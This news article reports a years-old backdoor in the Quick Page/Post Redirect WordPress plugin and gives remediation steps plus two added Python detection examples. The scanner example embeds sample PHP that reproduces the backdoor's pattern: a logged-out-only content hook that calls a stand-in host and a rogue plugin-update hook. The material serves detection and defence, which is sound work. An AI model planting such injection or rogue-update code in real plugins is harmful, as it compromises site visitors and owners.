Backdoored WordPress redirect plugin stayed hidden for years


A WordPress plugin used for page and post redirects was found with a years-old backdoor that could inject content into websites without showing it to logged-in administrators. The affected plugin is Quick Page/Post Redirect Plugin, which had more than 70,000 active installations before WordPress.org temporarily closed it for review.

The issue was uncovered by Austin Ginder of Anchor Hosting after a routine security check flagged unusual files on 12 customer sites. Those sites reported that they were running version 5.2.3, but the plugin files did not match the official WordPress.org release.

The tampered version contained code that contacted a third-party server and prepended returned content to public pages. The behavior was hidden from logged-in users, which made it harder for site owners and administrators to notice.

What happened

Quick Page/Post Redirect Plugin is a utility plugin that lets WordPress site owners create redirects for posts, pages, and custom URLs. The danger came from a hidden update channel that pointed outside the official WordPress.org plugin repository.

Ginder’s analysis found that versions 5.2.1 and 5.2.2 included a self-updater that contacted anadnet.com. That external update mechanism later delivered a tampered 5.2.3 build to some sites in March 2021.

The official WordPress.org version and the tampered version used the same version number, but their file hashes did not match. That made ordinary version checks unreliable.

At a glance

Affected plugin: Quick Page/Post Redirect Plugin
Plugin author account: anadnet
Reported active installs: More than 70,000 before closure
Suspicious version: Tampered 5.2.3 build from external update server
Original update-channel change: Added in October 2020, according to SVN history reviewed by Anchor
Main risk: Hidden content injection and possible remote code delivery
WordPress.org status: Closed temporarily as of April 14, 2026, pending review

How the backdoor worked

The tampered plugin hooked into WordPress page content and ran on public views of posts and pages. It checked whether the visitor was logged out before contacting the remote server.

That condition mattered. A site administrator checking the website while logged in would not see the injected material. Search engine crawlers and regular visitors could see different content.

Ginder said the remote server received the site name, page URL, and user agent. This setup allowed the operator to decide what content to return based on who was viewing the page.

Why the attack stayed hidden

The most important trick was the version number. A compromised site could report version 5.2.3 while running files that did not match the official 5.2.3 package from WordPress.org.

That means a site owner or scanner looking only at version numbers could miss the compromise. The plugin looked current enough, but the actual files had changed.

The remote content server is now offline, according to Ginder’s analysis. That means the backdoor appears dormant, but the issue still matters because the code remained on affected websites for years.

The update channel created the real risk

The plugin’s custom update checker created a path for code to arrive from outside WordPress.org. Once a plugin trusts an external update server, WordPress.org is no longer the only source of code for that plugin.

Anchor’s review of the plugin’s SVN history found that the update checker was added in October 2020 and removed from later official source code in February 2021. Existing installs that had already received the updater could still contact the external server.

In March 2021, affected sites pulled the altered 5.2.3 build from that external update path. That build added the hidden content injection behavior.
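Both behaviours described above, the logged-out-only content injection and the plugin-side update hook pointing outside WordPress.org, leave recognisable traces in plugin source. The following added example (not code from the plugin, from Anchor Hosting or from WordPress.org) is a heuristic scanner for those traces; the patterns, rule names and the sample PHP with its example.invalid hosts are constructed for this illustration, so a hit is a lead for manual review rather than proof of compromise.

```python
import re

# Heuristic patterns for the two behaviours the article describes. They are
# constructed for this example; a hit is a lead for manual review, not proof.
INDICATORS = {
    "content_hook": re.compile(r"add_(?:filter|action)\(\s*['\"](?:the_content|wp_head|wp_footer)['\"]"),
    "logged_out_gate": re.compile(r"!\s*is_user_logged_in\s*\("),
    "remote_fetch": re.compile(r"\b(?:wp_remote_get|wp_remote_post|curl_exec|file_get_contents)\s*\("),
    "update_hook": re.compile(r"['\"]pre_set_site_transient_update_plugins['\"]"),
    "external_url": re.compile(r"https?://(?![\w.-]*wordpress\.org)[\w.-]+"),
}
RULES = {
    "hidden content injection": ("content_hook", "logged_out_gate", "remote_fetch"),
    "external update channel": ("update_hook", "external_url"),
}

def scan_source(src):
    """Return {indicator: [line numbers]} for each indicator found in PHP text."""
    hits = {}
    for n, line in enumerate(src.splitlines(), 1):
        for name, rx in INDICATORS.items():
            if rx.search(line):
                hits.setdefault(name, []).append(n)
    return hits

def assess(hits):
    """Return the RULES names whose indicators are all present in the same file."""
    return [rule for rule, needed in RULES.items() if all(k in hits for k in needed)]

def scan_file(path):
    """Scan one PHP file on disk and return its findings (empty list if clean)."""
    with open(path, encoding="utf-8", errors="replace") as f:
        return assess(scan_source(f.read()))

# Constructed sample with the shape described above; hosts are placeholders.
SAMPLE_PHP = """<?php
add_filter('the_content', 'qppr_front');
function qppr_front($content) {
    if (!is_user_logged_in()) {
        $r = wp_remote_get('https://c.example.invalid/?u=' . $_SERVER['REQUEST_URI']);
        $content = wp_remote_retrieve_body($r) . $content;
    }
    return $content;
}
add_filter('pre_set_site_transient_update_plugins', 'qppr_update');
function qppr_update($t) {
    $t->response['qppr/qppr.php'] = (object) ['new_version' => '5.2.3', 'package' => 'https://u.example.invalid/qppr-5.2.3.zip'];
    return $t;
}
"""
```

Run `scan_file` over every `.php` file in a plugin directory; legitimate plugins that ship their own updater will trip the second rule, which is exactly the case worth a human look.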

WordPress.org has closed the plugin

The WordPress.org plugin page now says Quick Page/Post Redirect Plugin has been closed as of April 14, 2026 and is not available for download. The closure is listed as temporary while a full review continues.

The same page still shows older user reviews from 2022 complaining about injected spam, adware, and content hidden from administrators. Those older complaints suggest that suspicious behavior had been noticed publicly years before the 2026 review.

Ginder also noted that a 2022 support forum report included indicators related to the suspicious code. However, by then, the official WordPress.org source no longer contained the same code path.

Why this matters for WordPress site owners

This case shows why supply chain attacks can survive normal plugin updates and routine scanning. A plugin can look legitimate, keep a normal version number, and still run code that came from outside the official repository.

The risk is especially serious for redirect, SEO, analytics, and content-management plugins because they often touch front-end page output. If attackers control that output, they can inject spam links, phishing content, malicious redirects, or parasite SEO pages.

Even when the command server goes offline, site owners should not treat the plugin as safe. Dormant code can become active again if the related domain or subdomain starts responding.

What administrators should do

  • Check whether Quick Page/Post Redirect Plugin is installed on any WordPress site.
  • Uninstall the plugin if it is present, especially on sites with unknown file integrity.
  • Replace it with an actively maintained redirect plugin.
  • Run WP-CLI checksum verification against WordPress.org-hosted plugins.
  • Review public pages while logged out or from a clean browser session.
  • Check server logs for calls to anadnet.com or w.anadnet.com.
  • Scan for unexpected content injection hooks in plugin files.
  • Audit search results for spam pages or strange indexed content tied to the site.

The most reliable check is file integrity verification. WP-CLI can compare installed plugin files against the official WordPress.org checksum data.

If the checksum does not match, administrators should treat the plugin files as untrusted. Reinstalling the official package may remove the altered files, but replacing the plugin entirely is safer for many site owners.

WP-CLI checks can detect tampering

Ginder recommended using the built-in WP-CLI checksum verifier. This method compares plugin files on disk with the official WordPress.org checksum feed.

For this plugin, administrators can run the following command:

wp plugin verify-checksums quick-pagepost-redirect-plugin

If WP-CLI reports that a file checksum does not match, the site may have a tampered copy. This check catches file changes that version-based scanners can miss.
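As an added example of what the WP-CLI check does under the hood (not WP-CLI's own code, nor code from Anchor Hosting), the following compares a plugin directory against a per-file SHA-256 manifest and also reports files that are absent from the manifest, the kind of unusual file that surfaced this case. The manifest shape is assumed to mirror the per-file sha256 entries in WordPress.org's checksum feed; the fixture directory and its file contents are constructed so the example runs offline.

```python
import hashlib
import tempfile
from pathlib import Path

def sha256_of(path):
    """Hex SHA-256 of a file, read in chunks so large assets do not load into memory."""
    h = hashlib.sha256()
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(65536), b""):
            h.update(chunk)
    return h.hexdigest()

def verify_plugin_checksums(plugin_dir, manifest):
    """Compare plugin_dir with manifest ({relative path: {"sha256": hex}}).
    Returns a sorted list of (relative path, status), status being "mismatch",
    "missing" or "unexpected"; an empty list means the tree matches exactly."""
    root = Path(plugin_dir)
    on_disk = {p.relative_to(root).as_posix() for p in root.rglob("*") if p.is_file()}
    findings = []
    for rel, sums in manifest.items():
        if rel not in on_disk:
            findings.append((rel, "missing"))
        elif sha256_of(root / rel) != sums["sha256"]:
            findings.append((rel, "mismatch"))
    findings += [(rel, "unexpected") for rel in on_disk - set(manifest)]
    return sorted(findings)

def build_fixture(base):
    """Constructed fixture: write a tiny 'official' plugin, record its manifest, then
    tamper one file and add one, mirroring same-version drift as in the article."""
    plugin = Path(base) / "quick-pagepost-redirect-plugin"
    (plugin / "inc").mkdir(parents=True)
    official = {"qppr.php": "<?php // redirect logic\n", "readme.txt": "Stable tag: 5.2.3\n"}
    for rel, text in official.items():
        (plugin / rel).write_text(text)
    manifest = {rel: {"sha256": sha256_of(plugin / rel)} for rel in official}
    (plugin / "qppr.php").write_text("<?php // redirect logic plus an added hook\n")
    (plugin / "inc" / "extra.php").write_text("<?php // file absent from the official build\n")
    return plugin, manifest

def run_demo():
    """Build the fixture in a temp dir and return what the verifier reports."""
    with tempfile.TemporaryDirectory() as tmp:
        plugin, manifest = build_fixture(tmp)
        return verify_plugin_checksums(plugin, manifest)

if __name__ == "__main__":
    for rel, status in run_demo():
        print(f"{status:10} {rel}")
```

Note that readme.txt, which carries the version string, still matches; a version-only check would report this tree as a clean 5.2.3.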

Site owners who still need redirect management should move to a maintained alternative. Anchor recommended Redirection by John Godley or Safe Redirect Manager.

Before switching, administrators should export or document existing redirect rules. They should also test key URLs after migration to avoid broken redirects or traffic loss.

For larger fleets, teams should add scheduled checksum verification to their maintenance process. This can catch future cases where plugin files drift from the official package.

FAQ

Which WordPress plugin was affected?

The affected plugin is Quick Page/Post Redirect Plugin.

How many sites used the plugin?

Reports say the plugin had more than 70,000 active installations before WordPress.org closed it for review.

Was the plugin still available on WordPress.org?

No. WordPress.org says the plugin has been closed as of April 14, 2026 and is not available for download while a review continues.

Why did scanners miss the issue?

The tampered build used the same version number as an official release. Tools that checked only the version number could miss the file-level changes.
